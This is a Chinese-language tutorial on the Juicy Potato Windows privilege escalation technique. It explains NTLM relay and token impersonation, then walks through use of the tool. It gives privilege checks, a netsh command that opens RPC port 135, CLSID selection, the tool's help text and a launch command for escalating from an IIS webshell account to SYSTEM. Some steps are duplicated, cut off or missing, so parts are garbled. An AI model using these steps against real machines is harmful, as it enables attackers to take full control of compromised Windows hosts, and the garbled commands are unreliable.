烂⼟⾖提权Juicypotato 原理和利⽤
0x00 Potato
(烂⼟⾖)提权的原理:
所谓的烂⼟⾖提权就是俗称的MS16-075,可以将Windows⼯作站上的权限提升到 NT AUTHORITY \ SYSTEM – Windows计算机上可⽤的最⾼特权级别。
⼀、简单的原理:
攻击者可以诱骗⽤户尝试使⽤NTLM对他的计算机进⾏⾝份验证,则他可以将该⾝份验证尝试中继到另⼀台计算机!
Microsoft通过使⽤已经进⾏的质询来禁⽌同协议NTLM⾝份验证来对此进⾏修补。这意味着从⼀个主机回到⾃⾝的SMB-> SMB NTLM中继将不再起作⽤。但是,跨协议攻击(例如HTTP-> SMB)仍然可以正常使⽤!
⼆、理解流程:
1、控制HTTP流量⼤概都流经我们控制的HTTP服务器,做中介⼈攻击。
2、可以诱导系统⾼权⽤户执⾏⼀些操作,例如将它们重定向到需要NTLM⾝份验证的地⽅。所有NTLM凭据都将中继到本地SMB侦听器,以创建运⾏⽤户定义的命令的新系统服务,例如是Windows Update服务的请求时,就会是⼀个⾼权令牌,劫持掉这个令牌
3、最后模仿这个⾼权令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别⼈的令牌
0x01
使⽤⽅法
1、查看当前⽤户权限,是否符合要求createprocessa
2、查看RPC 默认端⼝是否为1352、查看RPC 默认端⼝是否为135
如果被修改(例如为111),juicypotato的参数可以使⽤ -n 111
如果系统禁⽤了RPC,并不是⼀定⽆法提权,需要满⾜如下条件:
到另⼀系统,能够以当前⽤户的权限进⾏远程RPC 登录,此时juicypotato 的参数可以使⽤-k
例如Win7、WIn8系统,默认配置下,允许135端⼝的⼊站规则即可进⾏远程RPC 登录
添加防⽕墙规则允许135端⼝⼊站的命令如下:netsh advfirewall firewall add rule name="135" protocol=TCP dir=in localport=135 action=allow
3、根据操作系统选择可⽤的CLSID
例如测试系统win7 ,选择CLSID为 {555F3418-D99E-4E51-800A-6E89CFD8B1D7}
4、选择⼀个系统未占⽤的端⼝作为监听端⼝
最终语句:
表⽰开启SeImpersonate权限创建进程,监听端⼝1111,使⽤的CLSID为{8BC3F05E-D86B-11D0-A075-00C04FB68820}
0x02 限制条件
经过以上的分析,Juicy Potato的限制条件如下:
需要⽀持SeImpersonate 或者SeAssignPrimaryToken 权限
开启DCOM
本地⽀持RPC 或者远程服务器⽀持PRC 并能成功登录
能够到可⽤的COM 对象T:\&
JuicyPotato v0.1
Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port
Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
whoami /all
whoami /priv
如果开启SeImpersonate 权限,juicypotato 的参数可以使⽤ -t t
如果开启SeAssignPrimaryToken 权限,juicypotato 的参数可以使⽤ -t u
如果均开启,可以选择-t * 如果均未开启,那么⽆法提权
< -t t -p c:\windows\ -l 1155 -c {8BC3F05E-D86B-11D0-A075-00C04FB68820}
⼀般从web拿到的webshell都是IIS服务器权限,是具有这个模仿权限的。⼀般⼤多数的服务型账户IIS、MSSQL等,有这个权限,⼤多数⽤户级的账户没有这个权限,这些都可以whoami /priv 试⼀下看看有没有模仿权限。
__EOF__

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。